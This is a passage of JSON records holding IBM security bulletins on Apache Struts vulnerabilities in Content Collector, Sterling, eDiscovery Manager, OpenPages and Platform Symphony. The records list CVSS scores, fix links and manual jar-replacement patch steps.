https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:21:52", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:21:52", "id": "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "href": "https://www.ibm.com/support/pages/node/6356621", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:12", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:07:08", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:07:08", "id": "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "href": "https://www.ibm.com/support/pages/node/6359445", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T19:06:03", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-05-11T01:06:34", "id": "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "href": "https://www.ibm.com/support/pages/node/6565845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T18:56:43", "description": "## Summary\n\nIBM Sterling File Gateway has addressed multiple security vulnerabilities in Apache Struts\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 2.2.0.0 - 6.0.3.2 \n \n## Remediation/Fixes\n\n** Product & Version**| **APAR**| ** Remediation & Fix** \n---|---|--- \n2.2.0.0 - 2.2.6.5_2| IT34076| Apply IBM Sterling B2B Integrator version 5.2.6.5_3, 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n6.0.0.0 - 6.0.3.2| IT34076| Apply IBM Sterling B2B Integrator version 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T15:14:01", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-07-22T15:14:01", "id": "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "href": "https://www.ibm.com/support/pages/node/6324787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T18:04:21", "description": "## Summary\n\nMultiple vulnerabilities in Apache Struts 2.3.x may affect IBM eDiscovery Manager. These are addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223990](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223990>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \neDiscovery Manager| 2.2.2 \n \n## Remediation/Fixes\n\nProduct\n\n| VRM| Remediation \n---|---|--- \nIBM eDiscovery Manager| 2.2.2| \n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-WIN-IF008&source=SAR> \"Interim Fix 008\" ) for Windows\n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF008&source=SAR> \"Interim Fix 008\" ) for AIX \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T10:00:46", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Apache Struts Affect IBM eDiscovery Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-07-12T10:00:46", "id": "80737D4B4CE626670083B16CA387FEFAC8045ECB16DACD55AD56FFAC544F21A4", "href": "https://www.ibm.com/support/pages/node/7011373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:52:34", "description": "## Summary\n\nIBM OpenPages GRC Platform Web Applications are not vulnerable to the Apache Struts 2 vulnerability CVE-2017-5638 \n\n## Vulnerability Details\n\nIBM OpenPages GRC Platform Web Applications are NOT vulnerable to the Apache Struts 2 vulnerability (CVE-2017-5638). \nPlease refer to [_https://cwiki.apache.org/confluence/display/WW/S2-045_](<https://cwiki.apache.org/confluence/display/WW/S2-045>) for more information on CVE-2017-5638.\n\n## Affected Products and Versions\n\nIBM OpenPages versions 7.0 through 7.3\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:49:16", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform Web Applications are not vulnerable to (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:49:16", "id": "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "href": "https://www.ibm.com/support/pages/node/294331", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:11", "description": "## Summary\n\nA Security vulnerability relating to remote code execution CVE-2017-5638 (S2-045) has been reported against Apache Struts 2, which IBM Platform Symphony uses as a framework for its WEBGUI service. The Struts 2 package version that is vulnerable to these issues is included in several past versions of IBM Platform Symphony Advanced Edition and Developer Edition. Struts 2.3.32 addresses this vulnerability and can be applied through the manual steps detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)\n\n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \n\n**CVSS Base Score:** **7.3**\n\n**CVSS Temporal Score: See **[**_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \n\n**CVSS 3.0 Environmental Score*:** **Undefined**\n\n**CVSS Vector:** **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)**\n\n## Affected Products and Versions\n\nIBM Platform Symphony **6.1.1, 7.1 Fix Pack 1**, and** 7.1.1**,** **and** **IBM Spectrum Symphony** 7.1.2** and **7.2**. All OS editions, including Linux and Windows, are affected. The remediation steps for Linux are provided in this document. For Windows, use the Linux steps as a reference and find the correct path for patching.\n\n## Remediation/Fixes\n\n1\\. For IBM Platform Symphony 6.1.1 or 7.1 Fix Pack 1, download the appropriate fix and follow the instructions in the readme file to upgrade to Struts version 2.3.32. \n\n**Product version**| **Fix ID** \n---|--- \nIBM Platform Symphony **6.1.1**| [_sym-6.1.1-build446371_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-6.1.1-build446371&includeSupersedes=0>) \nIBM Platform Symphony **7.1 Fix Pack 1**| [_sym-7.1-build446807_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build446807&includeSupersedes=0>) \n2\\. For IBM Platform Symphony 7.1.1 and higher, follow the steps to update to Struts version 2.3.32 on Linux hosts: 2.1 Log on to each management host in the cluster and download the struts-2.3.32-lib.zip package from the following location: [](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>)[_http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip_](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>) 2.2 Stop the Platform Management Console service (WEBGUI): > egosh service stop WEBGUI 2.3 For backup purposes, move the following files, which will be replaced by new files: **\\- For IBM Platform Symphony 7.1.1:** \n> mkdir -p /tmp/guibackup/symgui \n> mkdir -p /tmp/guibackup/perfgui \n> mv $EGO_TOP/gui/3.3/lib/commons-fileupload-1.3.1.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/3.3/lib/commons-io-1.2.jar /tmp/guibackup/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-fileupload-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/org.apache.commons-io-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-lang3-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/javassist-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-json-plugin-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-spring-plugin-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xstream-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n> mkdir -p /tmp/guibackup/egogui \n> mkdir -p /tmp/guibackup/perfgui \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-fileupload-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-io-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-lang3-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/org.apache.commons-io-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/freemarker-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/javassist-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/ognl-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-core-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-json-plugin-*.jar 